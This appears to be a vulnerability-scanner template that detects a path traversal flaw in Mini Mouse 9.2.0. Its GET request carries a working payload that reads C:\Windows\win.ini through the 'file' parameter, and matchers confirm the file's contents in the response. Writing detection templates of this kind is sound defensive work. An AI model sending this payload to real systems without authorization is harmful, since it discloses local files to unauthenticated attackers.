id: minimouse-lfi info: name: Mini Mouse 9.2.0 - Path Traversal author: 0x_Akoko severity: high description: A vulnerability in Mini Mouse allows remote unauthenticated attackers to include and disclose the content of locally stored files via the 'file' parameter. reference: - https://www.exploit-db.com/exploits/49744 tags: minimouse,lfi requests: - method: GET path: - "{{BaseURL}}/file=C:%5CWindows%5Cwin.ini" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "bit app support" - "fonts" - "extensions" condition: and part: body